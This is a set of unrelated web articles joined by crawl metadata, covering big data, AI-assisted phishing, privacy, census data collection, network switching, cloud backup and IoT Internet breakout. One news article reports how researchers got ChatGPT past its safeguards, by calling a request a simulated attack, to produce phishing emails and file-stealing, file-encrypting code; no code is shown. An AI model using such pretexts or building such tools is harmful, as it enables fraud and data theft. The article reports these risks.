The science community has also benefited from big data storage technology. Data analyst tools have been created that have assisted with breakthroughs in social science, evolutionary and human genome research. Big data analytics allows for the processing for huge amounts of DNA data which assists with investigating disease cures, patterns, and origins. Scientists may have even successfully unmasked the elusive street artist, Banksy, using large sets of geospatial data and criminology mathematical techniques.
Even science fiction is becoming science fact thanks to big data. China made recent headlines in it’s newest approach to big data applications with it’s recent attempt to utilize large data sets for pre-crime analysis. The city of New York is utilizing data mining procedures in efforts to revolutionize crime prevention using pattern recognition within large data sets.
Its results are allowing crime analysts to decipher data and better assess community needs. Additionally, with the recent influx of police brutality cases, high volume storage for police body cam footage has become a critical bullet point for large police departments to consider in their budgets.
What Does The Future Hold For Big Data?
Big Data and the Internet of Things
Since its inception big data has created tremendous opportunities and developments for not only entrepreneurs but also policemen, scientists, and communists. Its applications will only continue to become paramount in the future of all industries as we become more seduced by the “internet of things (IoT).”
In fact businesses are using IoT at a surprising rate (55 percent surveyed) to collect marketplace / operations data (or planned to within the year).
This just goes to show how the sheer amount of connected devices is making life easier to collect data for businesses. Big data and the Internet of Things is simply the perfect match and businesses are noticing.
Pretty soon your fridge will be able to decide exactly how much milk you need to nourish your famished cats and how many eggs you should purchase every month to satisfy your midnight omelet cravings. These “smart” devices will all utilize big data science and storage in order to make the best impression on its always evolving captive audience. | <urn:uuid:c3f79aca-dbbe-4d05-8876-1508c2a3bc9a> | CC-MAIN-2024-38 | https://www.colocationamerica.com/blog/possibilities-of-big-data-storage | 2024-09-08T04:26:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650958.30/warc/CC-MAIN-20240908020844-20240908050844-00528.warc.gz | en | 0.951708 | 1,389 | 3.34375 | 3 |
New AI Bot Could Take Phishing, Malware to a Whole New Level
Experts Warn ChatGPT Could Usher in Phishing 3.0, Democratize Hacking TechnologyAnything that can write a software code can also write malware. While most threat actors take several hours and sometimes even days to write malicious code, the latest AI technology can do it in seconds. Even worse, it could open the door to rapid innovation for hackers with little or no technical skills or help them overcome language barriers to writing the perfect phishing email.
Those are some of the fears in the cybersecurity community about the latest viral sensation, ChatGPT, an AI-based chatbot developed by OpenAI that specializes in dialogue. Simply ask a question, and it can compose a poem, write a term paper for a high schooler or craft malware code for a hacker.
Since the cybercrime market for ransomware as a service is already organized to outsource malware development, tools such as ChatGPT could make the process even easier for criminals entering the market.
"I have no doubt that ChatGPT and other tools like this will democratize cybercrime," says Suleyman Ozarslan, security researcher and co-founder of Picus Security. "It's bad enough that ransomware code is already available for people to buy off the shelf on the dark web. Now virtually anyone can create it themselves."
In testing ChatGPT, Ozarslan instructed the bot to write a phishing email, and it spat out a perfect mail within seconds. "Misspellings and poor grammar are often tell-tale signs of phishing, especially when attackers are targeting people from another region. Conversational AI eliminates these mistakes, making it quicker to scale and harder to spot them," he says.
While the terms of service for ChatGPT prohibit individuals from using the software for nefarious purposes, Ozarslan prompted the bot to write the phishing email by telling it the code would be used for a simulated attack. The software warned that "phishing attacks can be used for malicious purposes and can cause harm to individuals and organizations," but the bot created a phishing email anyway.
Despite the guardrails preventing users from causing mischief, numerous researchers found a way to bypass those warnings. "It's like a 3D printer that will not print a gun but will happily print a barrel, magazine, grip and trigger together if you ask it to," Ozarslan says.
Another computer researcher impressed by the capabilities of ChatGPT, Brendan Dolan-Gavitt, assistant professor at New York University, asked the bot to solve an easy buffer overflow challenge. ChatGPT correctly identified the vulnerability and wrote a code exploiting the flaw. Although it made a minor error in the number of characters in the input, the bot quickly corrected it after Brendan prompted.
Ozarslan asked the AI to write a software code in Swift, to be able to find all Microsoft Office files from his MacBook and send them over HTTPS to his web server. He also wanted the tool to encrypt all Microsoft Office files and send the private key to him for decryption.
Despite that action being potentially more dangerous than the phishing mail, ChatGPT sent the sample code without any warnings.
New Age of Deepfakes and Phishing 3.0
Peter Cassidy, general secretary with the Anti-Phishing Working Group, tells Information Security Media Group that phishing attacks have become more focused. "We've gone from broken English attacks against the banks in the English-speaking countries to extremely focused ones in order to create a false scenario about the victim," he says.
Cassidy explains how ChatGPT could make it easier for cybercriminals to achieve their targets in record numbers and with accuracy. "You can now get it to create a greeting for a birthday or wishes for someone who got out of the hospital, and in whichever language you want," he adds.
"Threat actors are never computer scientists when the arrests are made. It's always some 14-year-old kid who taught himself how to build malware from scratch, based on what he saw online. Phishing requires determination," he adds.
But tools for coders are also tools for threat actors. In a recent blog post, Eyal Benishti, CEO at Ironscales, called ChatGPT a double-edged sword and warned of AI leading to Phishing 3.0.
Deepfake technology uses AI to create fabricated content, making it look like the real thing. It has the proper context, and it sounds and reads like a legitimate message. "Imagine a combined attack where the threat actor impersonates a CEO with an email to accounting to create a new vendor account to pay a fake invoice, followed up by a fake voicemail with the CEO's voice acknowledging the authenticity of this email," he says.
"It is only a matter of time before threat actors combine phishing and pretext methods to deliver compelling, coordinated and streamlined attacks."
Now that personal information is publicly accessible over social media and other places on the web, it has become easier to harvest, correlate and put into context using sophisticated models designed to look for opportunities to create highly targeted attacks.
Only a week after it was introduced, ChatGPT has been banned on Stack Overflow, a Q&A forum for programmers. When many people posted answers from ChatGPT, presumably to farm points on the platform, Stack Overflow noticed "a high rate of incorrect answers, which typically look like they might be good," the moderators wrote.
A New Source for Malware Innovation?
In a tweet, OpenAI CEO Sam Altman agrees that cybersecurity is one of the principal risks of "dangerously strong AI."
And in a paper about OpenAI's code-writing model - Codex - the company researchers say that "the non-deterministic nature of systems like Codex could enable more advanced malware. While software diversity can sometimes aid defenders, it presents unique challenges for traditional malware detection and antivirus systems that rely on fingerprinting and signature-matching against previously sampled binaries."
Application security and model deployment strategies including rate-limiting access and abuse monitoring can manage this threat in the near term, "though that is far from certain," the report adds.
Although ChatGPT is scary good, it contains imperfections, and that gives protectors time to bring tighten the fences. "Attackers won't stand still, nor should the defenders. As AI makes it easier for attackers to scale, it's vital for companies to validate security against real-world attackers and be proactive against new threats like AI as they emerge, rather than waiting around to see how they will impact them in the future," says Ozarslan.
ChatGPT is built on the GPT-3 deep learning model, which was created by OpenAI in a partnership with Microsoft in 2019. Recently, Altman credited the Microsoft Azure cloud for providing the AI infrastructure that powers the GPT language models.
In November 2021, Microsoft launched the Azure OpenAI Service, giving Azure customers the ability to use OpenAI's machine-learning models, which were previously available by invitation only.
The partnership helps cement Microsoft's Azure cloud infrastructure as the platform of choice for the next generation of AI. | <urn:uuid:93e0f521-67b0-4d7b-8c9c-9468d6c26dd7> | CC-MAIN-2024-38 | https://www.databreachtoday.com/new-ai-bot-could-take-phishing-malware-to-whole-new-level-a-20709 | 2024-09-13T01:43:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00128.warc.gz | en | 0.948991 | 1,481 | 2.875 | 3 |
The Washington Post reports that a recent poll conducted shows that 3 out of 5 Americans are unable or unwilling to use an infection-alerting app developed by Google and Apple. About 1 in 6 adults can’t use the app because they don’t own a smartphone—with the lowest ownership levels for those 65 and older. People with smartphones evenly split between those willing versus unwilling to use such an app.
The primary concern among those not willing to use such an app comes from the distrust people have about the ability or willingness of those two tech companies to protect the privacy of their health data. This unwillingness to use such an app, particularly after seeing the impact that the virus is having on the economy, is disturbing to scientists who have said that 60% or more of the public would need to use such an app to be effective.
This distrust of tech companies is nothing new. In November, the Pew Research Center published the results of the survey that showed how Americans feel about online privacy. That study’s preliminary finding was that more than 60% of Americans think it’s impossible to go through daily life without being tracked by tech companies or the government.
To make that finding worse, almost 70% of adults think that tech companies will use their data in ways they are uncomfortable with. Nearly 80% believe that tech companies won’t publicly admit guilt if they are caught misusing people’s data. People don’t feel that data collected about them is secure, and 70% believe data is less secure now than it was five years ago.
Almost 80% of people are concerned about what social media sites and advertisers know about them. Probably the most damning result of the survey is that 80% of Americans feel that they have no control over how data is collected about them.
There is no mystery about why people are worried about the collection of personal data. There have been headlines for several years talking about how personal data has been misused. The Facebook/Cambridge Analytica data scandal showed a giant tech company selling personal data that was used to sway voters. The big cellular companies were caught selling customer location data several times, which lets whoever buys it understand where people travel throughout each day. Phone apps of all sorts report back location data, web browsing data, and shopping habits, and nobody seems to be able to tell us where that data is sold. Even the supposed privacy advocate Apple lets contractors listen to Siri recordings.
It’s not a surprise that with the distrust of tech companies, it’s becoming common for politicians to react to privacy breaches. For example, a bill was introduced into the House last year that would authorize the Federal Trade Commission to fine tech companies to as much as 4% of their gross revenues for privacy violations.
California recently enacted a new privacy law with strict requirements on web companies that mimic the regulations used in Europe. Web companies must provide California consumers the ability to opt-out from having their personal information sold to others. Consumers must be given the option to have their data deleted from the site. Consumes must be provided the opportunity to view the data collected about them. Consumers also must be shown the identity of third parties that have purchased their data.
The unwillingness to use the COVID-tracking app is probably the societal signal that the hands-off approach we’ve had for regulating the Internet needs to come to an end. Most hands-off policies were developed twenty years ago when AOL was conquering the business world, and legislators didn’t want to tamp down on a nascent industry. The tech companies are among the biggest and richest companies in the world, and there is no reason not to regulate some of their worst practices. This won’t be an easy genie to put back in the bottle, but we have to try. | <urn:uuid:5d136c8e-999e-4621-83ca-c2c9c7f9f713> | CC-MAIN-2024-38 | https://circleid.com/posts/20200603-privacy-in-the-age-of-covid-19 | 2024-09-20T10:33:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00428.warc.gz | en | 0.971616 | 776 | 2.578125 | 3 |
The federal government is always trying to do more with less. And few federal agencies need to do more than the Census Bureau, which once a decade collects information on every person living in the country.
Recently, the government has been able to save time and reduce costs by using mobile devices and data. So it’s not surprising that the Census Bureau plans to make a historic change to the way data will be collected, stored and shared for Census 2020. Field workers and respondents will now have the option to trade in their pens and paper — instead recording information using mobile devices and online applications.
To evaluate the performance of mobile data collection, the Census Bureau launched tests in the greater Houston and Los Angeles metropolitan areas in late March.
The use of advanced technology to document information was originally under consideration for the 2010 Census, but traditional recording methods were still used due to logistical complications during the testing process. Similarly, the Census Bureau will analyze the results and execution of mobile data collection from these 2016 census tests to determine whether it will be the new standard.
The census is a critical component to reporting statistical and demographic information for our country, making it imperative that all sensitive data be collected accurately and stored safely.
What Does the Mobile Transition Mean?
The first enumeration took place in 1790 and every decade since then, the Census Bureau has relied heavily on using hard copies to document and save data. However, this antiquated method has become tedious and expensive, and the Census Bureau has taken note.
For the 2016 census tests, field workers have the ability to use mobile devices to record data, while respondents can share their information online, over the phone and, in rare cases, through paper questionnaires.
Often times, the census is viewed as a key measurement of domestic growth. One of the greatest ways to show progression and advancement through this process is to change the way invaluable census data is recorded. As a result of technology used in the census, including geospatial information systems, there will be a reduced need for door-to-door census taking.
The task of optimizing mobile application performance will be a significant undertaking, which is why the 2016 census tests serve as the gateway to a full digital transition for 2020. Using technology and optimized networks will reduce the ramifications of congestion, latency and loss of information.
Mobile data collection and the shift to online methods for collecting data is projected to maximize efficiency, while potentially saving the federal government millions of dollars. As the Census Bureau works toward these goals, it may face challenges as a result of collecting data through mobile platforms.
The Right Way for Mobile Data Collection
The transition to using mobile technology will be a huge feat for the Census Bureau. To ensure high levels of accuracy and precision in the way data is tracked and stored, wide-area network, or WAN, verification is an absolute must.
Taking a glance at the 2016 census trials, 225,000 households in each testing location are participating. Incorporating WAN verification and optimization into the tests allows for mobile application to perform at a high level, while also enabling activity to occur in multiple places simultaneously. Optimization delivers the critical ability to pinpoint the clearest path from the data center using a wireless signal within a network, which makes it one of the most efficient processes for mobile data collection.
The Census Bureau chose to launch the tests in the Houston and Los Angeles metropolitan areas for a number of reasons, but noted the varying levels of internet usage as a key determining factor. Securing the census network is crucial, as field workers that are using mobile technology to collect data must have a combination of online and offline capabilities.
Security will be a key issue, as a recent survey found that 89 percent of federal IT leaders worry about data security at remote office locations and the Census 2020 will involve hundreds upon hundreds of those locations to collect the vast amount of data needed.
Foreshadowing Census 2020
If the 2016 census tests are successful, the use of mobile technology and online networks will be the new mode of collecting and saving census data moving forward. It is a critical time for the Census Bureau, which must prove these new technologies can withstand the onslaught of data it will face during Census 2020.
Census 2020 could mark a turning point for data collection by the federal government, if done properly.
For example, optimized networks would lead to a census questionnaire being completed in the field and data being sent 20 times faster than non-optimized networks — that is the equivalent of flying from New York to Los Angeles compared to driving. Essentially, that is what Census is trying to accomplish by removing the need to stop at every home in the country.
As the private sector increases its reliance on mobile data and technology, it is only expected that the federal government will follow suit. The current Census 2020 tests are the latest reflection of this mobile transition and its results will have far-reaching implications. | <urn:uuid:2b5a8026-be24-4c04-bf60-a1bc344bab7f> | CC-MAIN-2024-38 | https://develop.fedscoop.com/putting-census-2020-to-the-test/ | 2024-09-20T11:19:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00428.warc.gz | en | 0.937903 | 989 | 2.984375 | 3 |
On April 3rd, GDT Network Engineer Ryan Rogers presented, as part of the GDT DevOps team’s weekly Lunch & Learn series, information about blockchain. As defined by Investopedia, blockchain is a digitized, decentralized, public ledger of all cryptocurrency transactions. Ryan uses Bitcoin as the marquee, certainly most noteworthy, implementation of the blockchain algorithm. He begins with a simple definition of blocks, and what can be stored within them. He discusses both the benefits and drawbacks of distributed blockchains, referred to as a Distributed Ledger. Ryan concludes the presentation with a summary of the data structure, hashing, and the power of distribution. There’s a great Q & A session at the end that includes information on use cases, scalability, and the drawbacks of blockchain. Give it a watch–great info! | <urn:uuid:4978adad-2525-48e6-87db-cf65c5e0c018> | CC-MAIN-2024-38 | https://gdt.com/category-resources/gdt-presents-lunch-learn-on-blockchain/ | 2024-09-10T16:39:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00428.warc.gz | en | 0.932452 | 169 | 2.8125 | 3 |
A network switch is a machine organizing gadget that is utilized to join gadgets together on a machine system, by utilizing a manifestation of bundle switching to forward information to the end gadget. A system switch is viewed as more developed than a center point in light of the fact that a switch will just forward a message to one or different gadgets that need to get it, as opposed to TV the same message out of each of its ports. One must know about them all. Here is some information which can be useful for understanding the Cisco switches;
A system switch is a multi-port system connects that methodologies and advances information at the information connection (layer 2) of the OSI model. Switches can likewise consolidate directing notwithstanding crossing over; these switches are generally known as layer-3 or multilayer switches. Switches exist for different sorts of systems including Fiber Channel, Asynchronous Transfer Mode, Ethernet and others.
A collision domain is a segment of a system where information parcels can have collision with each other while being sent on an imparted medium or through repeaters, especially when utilizing early forms of Ethernet. A system collision happens when more than one gadget endeavors to send a bundle on a system section in the meantime. Crashes are determined utilizing bearer sense numerous accesses with collision recognition (CSMA/CD) in which the contending parcels are disposed of and re-sent each one in turn. This turns into a wellspring of wastefulness in the network. Stand out gadget in the collision domain may transmit at any one time, and alternate gadgets in the space listen to the system with a specific end goal to evade information crashes. Since stand out gadget may be transmitting at any one time, aggregate system data transfer capacity is imparted among all gadgets. Crashes likewise abatement system productivity on a crash space; if two gadgets transmit at the same time, and collision happens, and both gadgets must retransmit at a later time. Since information bits are proliferated at a limited velocity, all the while is to be characterized as far as the measure of the collision domain and the base parcel size permitted. A more diminutive parcel size or a bigger measurement would make it feasible for a sender to wrap up the bundle without the first bits of the message having the capacity to achieve the most remote hub. In this way, that hub could begin sending too, without a sign to the transmission effectively occurring and wrecking the first bundle. Unless the measure of the collision space permits the starting sender to get the second transmission endeavor - the crash - inside the time it takes to send the bundle he would none, of these have the capacity neither to discover the collision nor to rehash the transmission - this is known as a late crash.
Collision spaces are found in a center point or repeater environment where each one host portion join with a center that speaks to stand out crash space inside one show area. Collision domains are likewise found in other imparted medium systems, e. g. remote systems, for example, Wi-Fi. Current wired systems utilize a system switch to wipe out crashes. By joining every gadget straightforwardly to a port on the switch, either each one port on a switch turns into it collision space (on account of half duplex connections) or the likelihood of collisions is wiped out totally on account of full duplex connections.
A broadcast domain is a coherent division of a machine system, in which all hubs can achieve one another by telecast at the information connection layer. A telecast area could be inside the same LAN section or it might be crossed over to other LAN sections. Regarding current prominent innovations: Any machine joined with the same Ethernet repeater or switch is a part of the same telecast area. Further, any machine joined with the same set of between associated switches/repeaters is a part of the same show area. Switches and other higher-layer gadgets structure limits between telecast domains. This is as contrasted with a crash area, which would be all hubs on the same set of between associated repeaters, isolated by switches and learning extensions. Collision domain is for the most part more modest than, and contained inside, show spaces. While some layer two system gadgets can isolate the crash domain, telecast spaces are just isolated by layer 3 system gadgets, for example, switches or layer 3 switches. Differentiating VLANS partitions show spaces too, however gives no intends to system these without layer 3 functionality. The refinement in the middle of telecast and collision domain comes to fruition on the grounds that straightforward Ethernet and comparable frameworks utilize an imparted transmission framework. In straightforward Ethernet (without switches or extensions), information edges are transmitted to all different hubs on a system. Each one accepting hub checks the terminus location of each one edge, and basically overlooks any casing not tended to its own particular MAC.
Switches go about as cradles, getting and breaking down the edges from each one joined system section. Casings bound for hubs associated with the starting fragment are not sent by the switch. Edges bound for a particular hub on an alternate section are sent just to that fragment. Just show casings are sent to all different portions. This lessens unnecessary activity and collisions.
In such a switched system, transmitted edges may not be gotten by all other reachable hubs. Ostensibly, just show casings will be gotten by all different hubs. Collisions are confined to the system section they happen on. In this way, the telecast area is the whole between joined layer two system, and the fragments associated with each one switch/scaffold port are every collision space. Not all system frameworks or media peculiarity telecast/collision domain. Case in point, PPP joins.
Both store-and-forward and cut-through Layer 2 switches build their sending choices in light of the end MAC location of information parcels. They additionally learn MAC addresses as they look at the source MAC (SMAC) fields of parcels as stations correspond with different hubs on the system.
At the point when a Layer 2 Ethernet switch launches the sending choice, the arrangement of steps that a switch experiences to figure out if to forward or drop a bundle is the thing that separates the cut-through technique from its store-and-forward partner. While a store-and-forward switch settles on a sending choice on an information parcel after it has gotten the entire casing and checked its respectability, a cut-through switch takes part in the sending process not long after it has analyzed the end MAC (DMAC) location of an approaching edge. In principle, a cut-through switch gets and looks at just the initial 6 bytes of an edge, which conveys the DMAC address. On the other hand, for various reasons, as will be demonstrated in this record; cut-through switches hold up until a couple of more bytes of the edge have been assessed before they choose whether to forward or drop the parcel.
It means that the LAN switch duplicates each one complete casing into the switch memory supports and figures a cyclic repetition check (CRC) for lapses. CRC is a lapse checking strategy that uses a numerical equation, in light of the quantity of bits (1s) in the edge, to figure out if the casing has error. In the event that a CRC mistake is discovered, the edge is tossed. In the event that the edge is lapse free, the switch advances the casing out the fitting interface port.
This kind of switching will hold up until the whole edge has landed before forwarding it. This system saves the whole edge in memory. Once the frame is in memory, the switch checks the end of the line address, source address, and the CRC. On the off chance that no slips are available, the edge is forwarded to the proper port. This procedure guarantees that the destination system is not influenced by tainted or truncated frames. It implies that the LAN switch duplicates each one complete casing into the switch memory cradles and figures a cyclic repetition check (CRC) for blunders. CRC is a slip checking strategy that uses a scientific equation, taking into account the quantity of bits (1s) in the casing, to figure out if the edge has error. In the event that a CRC slip is discovered, the casing is tossed. On the off chance that the edge is lapse free, the switch advances the casing out the proper interface port.
With cut-through switching, the LAN switch duplicates into its memory just the terminus MAC address, which is spotted in the initial 6 bytes of the edge after the introduction. The switch finds the goal MAC address in its switching table, decides the cordial interface port, and advances the casing on to its end through the assigned switch port. A cut-through switch diminishes delay on the grounds that the switch starts to forward the edge when it peruses the objective MAC address and decides the friendly switch port. Cut-Through switching will begin forwarding the casing when the end of the line location is identified. The distinction in the middle of this and Store-and-Forward is that Store-and-Forward gets the entire casing before forwarding. Since outline slips can't be recognized by perusing just the destination location, Cut-Through may effect system execution by forwarding undermined or truncated casings. These terrible edges can create show storms wherein a few gadgets on the network respond to the ruined casings at the same time.
Outlines with and without blunders are sent in cut-through switching operations, leaving the lapse location of the edge to the planned beneficiary. On the off chance that the getting switch decides the casing is eroded, the edge is tossed out to the bit can where the edge is consequently disposed of from the network. Cut-through switches don't perform any slip checking of the casing on the grounds that the switch searches just for the outline's end of the line MAC address and advances the edge out the suitable switch port. Cut-through switching brings about low switch idleness. The downside, notwithstanding, is that awful information outlines, and additionally great edges, are sent to their ends of the line. At the outset, this may not sound awful in light of the fact that most system cards do their own particular edge checking of course to guarantee great information is gotten. You may find that if your system is broken down into workgroups, the probability of awful edges or crashes may be minimized, thus making cut-through switching a decent decision for your system.
An Ethernet switch's part is to duplicate Ethernet outlines starting with one port then onto the next. The vicinity of a CAM table is one trait that differentiates a change from a center point. Without a practical CAM table, all edges got by a system switch would be reverberated vacate to all different ports, much like an Ethernet center point. A switch ought to just radiate an edge on the port where the end system gadget lives (unicast), unless the casing is for all hubs on the switch (telecast) or different hubs (multicast). By and large, the CAM table is a framework memory build utilized by Ethernet switch rationale to diverse Media Access Control (MAC) locations of stations to the ports on which they associate with the switch. This permits switches to encourage correspondences between joined stations at high velocity paying little heed to what number of gadgets are associated with the switch. The CAM table is counseled to settle on the casing sending choice. Switches take in MAC addresses from the source location of Ethernet casings on the ports, for example, Address Resolution Protocol reaction packets. Cam tables are frequently the focus of layer 2 system assaults in a neighborhood to set up man-in-the-center assaults. A risk operator which has control of a gadget joined with an Ethernet switch can assault the switch's CAM table. This assault generally includes abusing powerlessness in switch plan that shows up when the switch uses up space to record the majority of the MAC location to port mappings it learns. In the event that the table tops off because of MAC flooding, most switches are no more equipped to dependably include new MAC addresses.
Hence one can know by reading this all that how important a cisco switch is. Also, the switch can perform many functions which one must know so that he can know how the networks work and how they can be used in more beneficial way.
SPECIAL OFFER: GET 10% OFF
Pass your Exam with ExamCollection's PREMIUM files!
SPECIAL OFFER: GET 10% OFF
Use Discount Code:
A confirmation link was sent to your e-mail.
Please check your mailbox for a message from firstname.lastname@example.org and follow the directions.
Download Free Demo of VCE Exam Simulator
Experience Avanset VCE Exam Simulator for yourself.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial. | <urn:uuid:820585dc-b124-4715-b45f-f2173b9bca58> | CC-MAIN-2024-38 | https://www.examcollection.com/certification-training/ccna-switching-concepts-and-operation-of-cisco-switches.html | 2024-09-11T23:09:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00328.warc.gz | en | 0.918157 | 2,617 | 3.25 | 3 |
Importance of Cloud-Based Data Backup
The deluge of digital data in today’s digital economy is unprecedented. Cloud-based data backup creates an opportunity to support both fast disaster recovery and business continuity for organizations of all sizes.
In a study conducted by IDC and commissioned by EMC, in 2020, digitally created data is expected to reach an astounding 40,000 exabytes – that’s equivalent to 40 trillion gigabytes or over 5,200 gigabytes for every man, woman and child in 2020.
Not all digital data are created equal. Some are meant to be kept for a long period of time, while others are short-lived. For instance, the General Data Protection Regulation (GDPR), a European Union (EU) law that’s scheduled to be implemented on May 25, 2018 requires EU and non-EU based organizations that offer goods or services or monitor the behavior of EU residents to delete data that no longer serves the original purpose or when affected individuals withdraw their consent for their data to be processed.
While some data might be short-lived, their sensitive nature still necessitates that they should be protected similar to long-term data.
3-2-1 Data Backup Rule
Backing up important and sensitive data isn’t just an option for every organization, but it’s a necessity. Digital data by its very nature is susceptible to loss and corruption. One or two data backups aren’t even enough. The acceptable practice for data backup is the 3-2-1 rule. This rule requires 3 copies of important digital data, 2 different media types to backup files and 1 copy offsite.
Rule 3: Keep 3 Copies of Any Important File
This means that your organization needs to keep 1 primary and 2 backups of important digital data. Three copies of digital data ensure that in case the original and even the first backup are lost or corrupted, your organization still has another copy to turn to.
A primary copy can be stored in your organization’s in-house servers, while the two backup copies can be stored on separate in-house servers and another backup to be stored offsite or in the cloud.
Rule 2: Use 2 Different Media Types to Backup Files
The rule requires that backups need to be in two different formats. Different media types offer different protection. The reasoning behind 2 different media types is that it’s never a good idea to “put all eggs in one basket”.
There are a number of media types to which your organization can backup important digital files. The next rule is considered as a different type of media.
Rule 1: Store 1 Copy Offsite
The chances of losing your organization’s important data as a result of in-house hazards such as hardware failure, software failure and natural disasters (flooding, earthquakes and storms) can’t be ignored. Thus, it’s essential to store important digital files offsite. The best way to store digital files offsite is through the cloud.
Cloud backup, also known as online backup, is the process of backing up data by sending via the internet a copy of important digital data to an offsite server.
An offsite server is typically hosted by a third-party service provider. Amazon Simple Storage Service (S3), Microsoft OneDrive and IDrive are examples of third-party offsite server service provider. These third-party offsite server service providers usually charge customers a fee based on number of users, capacity and bandwidth.
Pros of Cloud Backup
Here are some of the advantages of a cloud backup:
- Defense against Worst-Case Scenarios
Having a cloud backup will protect your organization against some of the worst-case scenarios that might happen onsite, including critical failures of onsite computers due to malicious software (malware) and natural disasters.
- Location Independent
With cloud backup, data can be retrieved anytime, regardless of your location, so long as you’ve got an internet connection.
- No Need to Invest in Hardware and Software
With cloud backup, there’s no need to invest in hardware and software.
- Regulatory Compliance
Some third-party offsite server service providers – important to know that not all comply with regulation – can ensure regulatory compliance in handling your organization’s sensitive data, an assurance that many small organizations can benefit from.
Cons of Cloud Backup
Here are some of the disadvantages of cloud backup:
- Internet Intermittence
Internet connection and volume of data can affect the sending and retrieval of data backup to and from the third-party offsite server service provider. Delay in sending and retrieving data backup is an acknowledged hazard for cloud backup. This time lag demands that only the important or sensitive data needs to be backed up in the cloud.
- Lack of Control
With cloud backup, your organization has little or no information at all about the service provider’s cloud infrastructure. Your organization, in essence, surrenders most of the control over the data backup.
Cloud Backup Security
Considering that your organization will have no control over the data backed up in the cloud, it’s essential to choose the right third-party offsite server service provider.
Here are some tips on choosing the right cloud storage service provider and ensuring cloud backup security:
- Prior to entrusting your organization’s critical data to a cloud service provider, carefully examine its service agreement regarding security practices.
- Look for a cloud service provider that’ll encrypt your organization’s data following established encryption algorithms. Encryption – the process of converting digital data into a code – makes it harder for attackers to gain access to sensitive data.
- Send and retrieve sensitive data to and from the cloud only via a secure internet connection.
- Follow established network security practices, including the use of firewalls.
Protecting important and sensitive data is critical to your organization’s survival. Storing important data inside your organization’s office is simply not enough. Important and sensitive data needs to be stored in the cloud as well.
At GenX, we offer data storage management services, including:
- One-time installation of all required hardware and software
- Varied data storage solutions, such as cloud-based backup systems
- Centralizing backup systems, for more reliable and streamlined services
- Offsite storage of sensitive information to protect against data loss due to office hardware damage
- Thorough testing of backup and storage procedures for ensured reliability of disaster protocols
- Continued technical support through our GenX helpdesk services | <urn:uuid:603347f1-719e-438c-b3d7-12c85f047974> | CC-MAIN-2024-38 | https://www.genx.ca/importance-cloud-based-data-backup | 2024-09-12T00:11:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00328.warc.gz | en | 0.918752 | 1,353 | 2.515625 | 3 |
Quick definition: An Internet breakout is the point at which data passes from a private network to the public Internet.
So an Internet breakout may be your local Wi-Fi router at home - or the gateway of your IoT sensors. In a cellular network internet breakout is the point where the data leaves the operator network. So for local networks such as Wi-Fi or Bluetooth - the internet breakout is usually at the location of the device itself - for cellular networks the breakout is in a central place of the home operator - the one that sold the SIM card.
This creates significant challenges for organizations with globally distributed devices, as data may have to be transported across multiple countries or even continents to pass through a centralized datacenter of the home operator before it can start traveling to its destination.
It’s kind of like if you were trying to mail a letter to your neighbor, and the carrier had to transport the envelope to a shipping center across the globe before delivering it. It would be absurd. But some organizations get stuck in a similar process with their data.
Thankfully, just as there’s a much more efficient way to deliver the mail, there’s a much more efficient way to handle Internet breakout and transport data.
Internet breakout and cloud computing
When the devices are close to the operator datacenter, such as in a single country, a centralized Internet breakout model doesn’t inhibit performance and slow down data transfers. But companies with distributed devices that access the Internet from locations scattered all over the world will be impacted by packet loss and longer latency. These organizations need a decentralized model that allows devices to deliver data in the shortest path to the application which the customer accesses - without transferring data along circuitous routes.
These organizations usually plan a distributed application infrastructure to optimize the data transfer in their customer markets. While some organization can afford to expand their infrastructure and build additional datacenters to streamline data transport across the world, with the advent of cloud computing and the wealth of cloud service providers available today, even small businesses can afford a distributed infrastructure that they do not have to build and buy by themselves.
Cloud computing enables companies to pay for access to datacenters located around the world, allowing them to move the application servers closer to their endpoints, reducing the time it takes to transmit and receive data - if it was not about the home routing of the mobile network operators.
Local Internet breakout
Local Internet breakout is when a distributed network uses local Internet Service Providers (ISPs) to place Internet access points closer to end users. By routing data through the local ISP, the network can exchange data between devices much more quickly.
Regional Internet breakout
Regional Internet breakout is when a distributed network routes data through regional data centers, typically through a major cloud service provider like Amazon AWS, Microsoft Azure, or Google Cloud.
emnify uses AWS to facilitate dynamic regional Internet breakout, where emnify dynamically selects the closest breakout region based on a device’s location - and at the same time uses other availability zones as backups to prevent downtime.
While traditional MNOs route your data through their own centralized server, whether you’re in-network or roaming, emnify brings the data closer to your distributed servers. Your devices stay connected anywhere in the world, and everywhere you deploy, your customers enjoy the same low-latency connectivity.
Internet breakout data regulation and security
One of the biggest challenges with home routing and centralized Internet breakout is data processing regulation and security. Part of the appeal of a centralized Internet breakout model is that the data travels to all different continents your customers may not allow the data to go - and the data takes long routes over the public internet.
But that’s not the case with emnify. Our cloud native platform keeps the customer data local and brings the same secure connectivity to every deployment, protecting your IoT devices with specialized IoT SIM cards, IMEI locks, connectivity profiles, network firewalls, VPN capabilities, and more.
Take your IoT connectivity global
emnify is an IoT communication platform that leverages cellular technology to connect your devices to more than 540 networks in over 180 countries. Wherever you deploy, emnify routes your data through dynamic regional Internet breakouts, keeping your connections both fast and secure. See how EMnify's IoT connectivity works.
Get in touch with our IoT experts
Discover how emnify can help you grow your business and talk to one of our IoT consultants today!
Kalliopi is a CS Manager, highly motivated at integrating different solutions and helping customers enable and facilitate their daily business.
What Is IoT Security? Risks, Examples, and Solutions
Any Internet-enabled device is vulnerable to being hacked and misused. In the age of the Internet of Things, there are billions of connected devices someone could use to access private data, spread malware, or even cause tangible harm.
What Is Transport Layer Security (TLS)?
